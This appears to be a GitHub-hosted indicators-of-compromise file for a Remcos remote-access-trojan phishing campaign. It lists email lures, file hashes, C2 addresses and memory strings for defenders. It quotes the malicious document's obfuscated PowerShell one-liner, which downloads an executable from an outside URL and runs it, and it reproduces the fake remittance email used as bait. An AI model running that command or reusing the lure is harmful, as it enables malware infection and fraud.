-
Notifications
You must be signed in to change notification settings - Fork 84
/
2021-10-14 Remcos IOCs
65 lines (49 loc) · 1.35 KB
/
2021-10-14 Remcos IOCs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
THREAT IDENTIFICATION: REMCOS
SUBJECTS OBSERVED
ACH Remittance Advice
Separate Remittance Advice
SENDERS OBSERVED
EMAIL BODY
Payment receipt
Invoice #2020821
for ACH Remittance Advice
Paid on OCTOBER 14,2021
The Ink Supplies Corp
2093 PHILADELPHIA PIKE #5003
Claymont, Delaware 19703
United States
Kindly confirm receipt
Best Regards,
Accounts Payable
MALDOC FILE HASHES
Deposit Confirmation.xls
9bbb45d378b57d02424fc197a7ea7669
travelespecially.cmd
5ea928ce876726d313001f5cbd14bc65
POWERSHELL FROM MALDOC
C:\Users\analyst\Documents\samples>powershell -w hi sleep -Se 31;Start-BitsTrans
fer -Source htt`p://greenpayindia.com/wp-conternt/ConsoleApp18.e`xe -Destination
C:\Users\Public\Documents\brotherneed.e`xe;C:\Users\Public\Documents\brothernee
d.e`xe
PAYLOAD DOWNLOAD URL
http://greenpayindia.com/wp-conternt/ConsoleApp18.exe
REMCOS PAYLOAD FILE HASH
brotherneed.exe
aade455507f667318c83c42a95b3fc3c
It was renamed and copied as:
notepad.exe
aade455507f667318c83c42a95b3fc3c
REMCOS C2
lplazadtemins.duckdns.org:443
194.147.140.45:443
SUPPORTING EVIDENCE
https://tria.ge/211014-ye79wababj
STRINGS IN MEMORY
0x4603dc (16): Remcos_Mutex_Inj
0x460420 (24): Remcos Agent initialized
0x4656cc (29): Remcos restarted by watchdog!
0x465d24 (11): * Remcos v
0x46c628 (13): Remcos-NLSDTO
0x5f83d8 (23): Software\Remcos-NLSDTO\